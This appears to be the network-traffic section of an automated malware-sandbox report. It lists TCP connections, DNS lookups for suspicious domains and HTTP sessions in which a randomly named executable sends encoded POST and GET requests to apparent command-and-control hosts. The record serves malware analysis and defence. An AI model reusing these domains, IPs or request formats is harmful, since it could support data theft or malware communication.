                                                          Jan 10, 2025 23:06:59.671782970 CET8049988144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:06:59.671955109 CET8049988144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:06:59.672017097 CET4998880192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:00.556652069 CET4998880192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:01.575246096 CET4998980192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:01.580285072 CET8049989144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:01.580395937 CET4998980192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:01.594280005 CET4998980192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:01.599852085 CET8049989144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:02.216759920 CET8049989144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:02.216823101 CET8049989144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:02.216872931 CET4998980192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:03.103260994 CET4998980192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:04.122941971 CET4999080192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:04.128873110 CET8049990144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:04.128989935 CET4999080192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:04.148729086 CET4999080192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:04.154047966 CET8049990144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:04.154062033 CET8049990144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:04.806638956 CET8049990144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:04.806699991 CET8049990144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:04.806807041 CET4999080192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:05.650254011 CET4999080192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:06.669198990 CET4999180192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:06.674174070 CET8049991144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:06.674278021 CET4999180192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:06.686569929 CET4999180192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:06.691390991 CET8049991144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:07.337327957 CET8049991144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:07.337367058 CET8049991144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:07.337600946 CET4999180192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:07.341351032 CET4999180192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:07:07.346198082 CET8049991144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:07:12.377279997 CET4999280192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:12.382080078 CET8049992172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:12.382185936 CET4999280192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:12.404422045 CET4999280192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:12.409274101 CET8049992172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:13.061772108 CET8049992172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:13.062249899 CET8049992172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:13.062340021 CET4999280192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:13.915842056 CET4999280192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:14.934855938 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:14.941879988 CET8049993172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:14.942014933 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:14.958389044 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:14.963418007 CET8049993172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:15.602125883 CET8049993172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:15.602598906 CET8049993172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:15.602638960 CET8049993172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:15.602705956 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:15.602747917 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:16.462795019 CET4999380192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:17.487054110 CET4999480192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:17.491889954 CET8049994172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:17.491952896 CET4999480192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:17.512401104 CET4999480192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:17.517272949 CET8049994172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:17.517369986 CET8049994172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:18.140299082 CET8049994172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:18.142226934 CET8049994172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:18.142286062 CET4999480192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:19.025291920 CET4999480192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.044317007 CET4999580192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.049283981 CET8049995172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:20.049467087 CET4999580192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.059042931 CET4999580192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.063905001 CET8049995172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:20.696115971 CET8049995172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:20.696747065 CET8049995172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:20.696839094 CET4999580192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.699310064 CET4999580192.168.2.9172.67.182.198
                                                          Jan 10, 2025 23:07:20.704118967 CET8049995172.67.182.198192.168.2.9
                                                          Jan 10, 2025 23:07:25.745637894 CET4999680192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:25.750557899 CET804999613.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:25.750664949 CET4999680192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:25.765160084 CET4999680192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:25.770015955 CET804999613.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:26.218266010 CET804999613.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:26.218293905 CET804999613.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:26.218381882 CET4999680192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:27.275271893 CET4999680192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:28.294547081 CET4999780192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:28.299531937 CET804999713.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:28.299602985 CET4999780192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:28.314491987 CET4999780192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:28.319638968 CET804999713.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:28.758781910 CET804999713.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:28.758846998 CET804999713.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:28.758948088 CET4999780192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:29.822177887 CET4999780192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:30.841378927 CET4999880192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:30.846502066 CET804999813.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:30.846605062 CET4999880192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:30.861717939 CET4999880192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:30.866642952 CET804999813.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:30.866700888 CET804999813.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:31.325613022 CET804999813.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:31.325678110 CET804999813.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:31.325757027 CET4999880192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:32.369143009 CET4999880192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.388021946 CET4999980192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.393290043 CET804999913.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:33.393393993 CET4999980192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.403079987 CET4999980192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.408082962 CET804999913.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:33.879479885 CET804999913.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:33.879544020 CET804999913.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:33.879744053 CET4999980192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.882651091 CET4999980192.168.2.913.248.169.48
                                                          Jan 10, 2025 23:07:33.887511969 CET804999913.248.169.48192.168.2.9
                                                          Jan 10, 2025 23:07:39.379218102 CET5000080192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:39.384020090 CET8050000160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:39.384088993 CET5000080192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:39.399435043 CET5000080192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:39.404190063 CET8050000160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:40.376097918 CET8050000160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:40.376245975 CET8050000160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:40.376353025 CET5000080192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:40.376418114 CET8050000160.25.166.123192.168.2.9
                                                          Jan 10, 2025 23:07:40.376498938 CET5000080192.168.2.9160.25.166.123
                                                          Jan 10, 2025 23:07:40.916052103 CET5000080192.168.2.9160.25.166.123

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 23:05:39.339754105 CET | 192.168.2.9 | 1.1.1.1 | 0xf00f | Standard query (0) | www.einpisalpace.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:05:55.753168106 CET | 192.168.2.9 | 1.1.1.1 | 0xd1c | Standard query (0) | www.deacapalla.online | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:09.700700045 CET | 192.168.2.9 | 1.1.1.1 | 0x2e13 | Standard query (0) | www.unlimitu.website | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:22.997678995 CET | 192.168.2.9 | 1.1.1.1 | 0x548a | Standard query (0) | www.366800008.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:24.009547949 CET | 192.168.2.9 | 1.1.1.1 | 0x548a | Standard query (0) | www.366800008.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:25.025161982 CET | 192.168.2.9 | 1.1.1.1 | 0x548a | Standard query (0) | www.366800008.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:28.132672071 CET | 192.168.2.9 | 1.1.1.1 | 0x7dc | Standard query (0) | www.366800008.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:29.118953943 CET | 192.168.2.9 | 1.1.1.1 | 0x7dc | Standard query (0) | www.366800008.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:30.118838072 CET | 192.168.2.9 | 1.1.1.1 | 0x7dc | Standard query (0) | www.366800008.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:37.248590946 CET | 192.168.2.9 | 1.1.1.1 | 0x87b0 | Standard query (0) | www.dejikenkyu.cyou | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:50.903901100 CET | 192.168.2.9 | 1.1.1.1 | 0x2b3e | Standard query (0) | www.nhengtai.net | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:58.966353893 CET | 192.168.2.9 | 1.1.1.1 | 0x2e8f | Standard query (0) | www.031233226.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:07:12.359844923 CET | 192.168.2.9 | 1.1.1.1 | 0x3dc5 | Standard query (0) | www.grimbo.boats | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:07:25.717946053 CET | 192.168.2.9 | 1.1.1.1 | 0xdfd0 | Standard query (0) | www.autonomousoid.pro | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:07:38.888984919 CET | 192.168.2.9 | 1.1.1.1 | 0x5f58 | Standard query (0) | www.rpa.asia | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:07:53.044135094 CET | 192.168.2.9 | 1.1.1.1 | 0xc101 | Standard query (0) | www.pitaloka.xyz | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 23:05:39.352343082 CET | 1.1.1.1 | 192.168.2.9 | 0xf00f | No error (0) | www.einpisalpace.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:05:39.352343082 CET | 1.1.1.1 | 192.168.2.9 | 0xf00f | No error (0) | www.einpisalpace.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:05:55.972634077 CET | 1.1.1.1 | 192.168.2.9 | 0xd1c | No error (0) | www.deacapalla.online | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:09.711669922 CET | 1.1.1.1 | 192.168.2.9 | 0x2e13 | No error (0) | www.unlimitu.website | | 209.74.79.40 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:26.092196941 CET | 1.1.1.1 | 192.168.2.9 | 0x548a | Server failure (2) | www.366800008.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:26.092211008 CET | 1.1.1.1 | 192.168.2.9 | 0x548a | Server failure (2) | www.366800008.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:26.092221022 CET | 1.1.1.1 | 192.168.2.9 | 0x548a | Server failure (2) | www.366800008.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:31.216470003 CET | 1.1.1.1 | 192.168.2.9 | 0x7dc | Server failure (2) | www.366800008.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:31.216490984 CET | 1.1.1.1 | 192.168.2.9 | 0x7dc | Server failure (2) | www.366800008.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:31.216567993 CET | 1.1.1.1 | 192.168.2.9 | 0x7dc | Server failure (2) | www.366800008.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:37.261061907 CET | 1.1.1.1 | 192.168.2.9 | 0x87b0 | No error (0) | www.dejikenkyu.cyou | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:37.261061907 CET | 1.1.1.1 | 192.168.2.9 | 0x87b0 | No error (0) | www.dejikenkyu.cyou | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:37.261061907 CET | 1.1.1.1 | 192.168.2.9 | 0x87b0 | No error (0) | www.dejikenkyu.cyou | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:37.261061907 CET | 1.1.1.1 | 192.168.2.9 | 0x87b0 | No error (0) | www.dejikenkyu.cyou | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:37.261061907 CET | 1.1.1.1 | 192.168.2.9 | 0x87b0 | No error (0) | www.dejikenkyu.cyou | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:37.261061907 CET | 1.1.1.1 | 192.168.2.9 | 0x87b0 | No error (0) | www.dejikenkyu.cyou | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:37.261061907 CET | 1.1.1.1 | 192.168.2.9 | 0x87b0 | No error (0) | www.dejikenkyu.cyou | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:50.912728071 CET | 1.1.1.1 | 192.168.2.9 | 0x2b3e | Name error (3) | www.nhengtai.net | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:06:59.024689913 CET | 1.1.1.1 | 192.168.2.9 | 0x2e8f | No error (0) | www.031233226.xyz | 031233226.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 23:06:59.024689913 CET | 1.1.1.1 | 192.168.2.9 | 0x2e8f | No error (0) | 031233226.xyz | | 144.76.229.203 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:07:12.374167919 CET | 1.1.1.1 | 192.168.2.9 | 0x3dc5 | No error (0) | www.grimbo.boats | | 172.67.182.198 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:07:12.374167919 CET | 1.1.1.1 | 192.168.2.9 | 0x3dc5 | No error (0) | www.grimbo.boats | | 104.21.18.171 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:07:25.742908955 CET | 1.1.1.1 | 192.168.2.9 | 0xdfd0 | No error (0) | www.autonomousoid.pro | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:07:25.742908955 CET | 1.1.1.1 | 192.168.2.9 | 0xdfd0 | No error (0) | www.autonomousoid.pro | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:07:39.376694918 CET | 1.1.1.1 | 192.168.2.9 | 0x5f58 | No error (0) | www.rpa.asia | | 160.25.166.123 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:07:53.088196993 CET | 1.1.1.1 | 192.168.2.9 | 0xc101 | No error (0) | www.pitaloka.xyz | | 68.66.226.119 | A (IP address) | IN (0x0001) | false
                                                          • www.einpisalpace.shop
                                                          • www.deacapalla.online
                                                          • www.unlimitu.website
                                                          • www.dejikenkyu.cyou
                                                          • www.031233226.xyz
                                                          • www.grimbo.boats
                                                          • www.autonomousoid.pro
                                                          • www.rpa.asia
                                                          • www.pitaloka.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49974 | 188.114.97.3 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:05:39.621166945 CET | 486 | OUT | GET /2jc0/?bdi02je=02ITxlk7k5y73RXcEgyHf9eN5gBctaG4x5Z2Hm75JBt4EXaberRL5XNENm6Llqf4eDkRLvOACOcTLUte5cKTzLCIux+gwKEOB3rpq+QpBMz0/Iw+6w==&dZOh=OjIxv4 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.einpisalpace.shop
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
Jan 10, 2025 23:05:40.617919922 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:05:40 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zHYkuChScjLcDK5ZwtnlnP2Kf6lNJjPQ7dvVf1pIG9awHfbKteh0uzwzQfpDXwJ6zvz%2F9KWVyiCWZwQlyg63i6EeuJX8n3hXMNEJ2OKHe5L017ynYeY4KHs5YP1w1AsmCS10fx0BQhc%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffff8443d1fc3ee-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1514&min_rtt=1514&rtt_var=757&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=486&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: 591<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css">
Jan 10, 2025 23:05:40.617949963 CET | 1048 | IN | Data Raw: 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d
                                                          Data Ascii: body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spac


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49976 | 208.91.197.27 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:05:56.105657101 CET | 760 | OUT | POST /9tt6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deacapalla.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.deacapalla.online
                                                          Referer: http://www.deacapalla.online/9tt6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=c1LJtjQDkzBszT3rXKPsw1qy8tAoWHYh9pYlAMaqmPiIrZU3Vt+BLtmCo49ioa79zu80rKtXoVppJrgqiLmJlr4+9JTKRh1PWC2HcBMvsVo1A5DW4kvGs1L3OAjf6lJ5l4q8N3DG+hLF8uix1YQBmKI9Qi6gQpZawCwZijnvtKgwmhvJVcx1fxnvvUo5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49977 | 208.91.197.27 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:05:58.725145102 CET | 784 | OUT | POST /9tt6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deacapalla.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.deacapalla.online
                                                          Referer: http://www.deacapalla.online/9tt6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=c1LJtjQDkzBshjHrRpXshFq9g9AoEHY99pUlAJ6Em66Ir8Q3UpKBYdmCgY9n3q70zvBLrLhXoV9pJp4qiduKqb48wpTEOx1PWC2HcBIFsVA1ApTWqWLFt1L2ZwjfwFJ9l4qSN2Ps+jzF8vSx1JQCxaIzPy7zXcsupywhij/X1ZILhATXEu4uKmnIozhREhtos1kRf2eFK8IOYpFMHg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49978 | 208.91.197.27 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:06:01.310235023 CET | 1797 | OUT | POST /9tt6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deacapalla.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.deacapalla.online
                                                          Referer: http://www.deacapalla.online/9tt6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
Data Ascii: bdi02je= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49979 | 208.91.197.27 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:06:03.855287075 CET | 486 | OUT | GET /9tt6/?bdi02je=R3jpuUkZ7EJX4jqjTcmTvUqnmsYgEhE9uoYGKZnTkeq/io5yCJ6WA6X9pqF204rzk7Rku8NUjH1PNJ500I+1+upb+vrNHTsmBA3bSTQzlk0fY+b/7g==&dZOh=OjIxv4 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.deacapalla.online
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:06:04.680166006 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Fri, 10 Jan 2025 22:06:03 GMT
                                                          Server: Apache
                                                          Referrer-Policy: no-referrer-when-downgrade
                                                          Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                          Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                          Set-Cookie: vsid=911vr4840923640944995; expires=Wed, 09-Jan-2030 22:06:04 GMT; Max-Age=157680000; path=/; domain=www.deacapalla.online; HttpOnly
                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_baOlHDzM5B09cBIdTNk3ddT6tLW4o5ks1EZkdtDKuJ+aj4r+2XJas+lzB10vAMs+8kEcT7aZsrEKwWDtQz8vbA==
                                                          Content-Length: 2613
                                                          Content-Type: text/html; charset=UTF-8
                                                          Connection: close
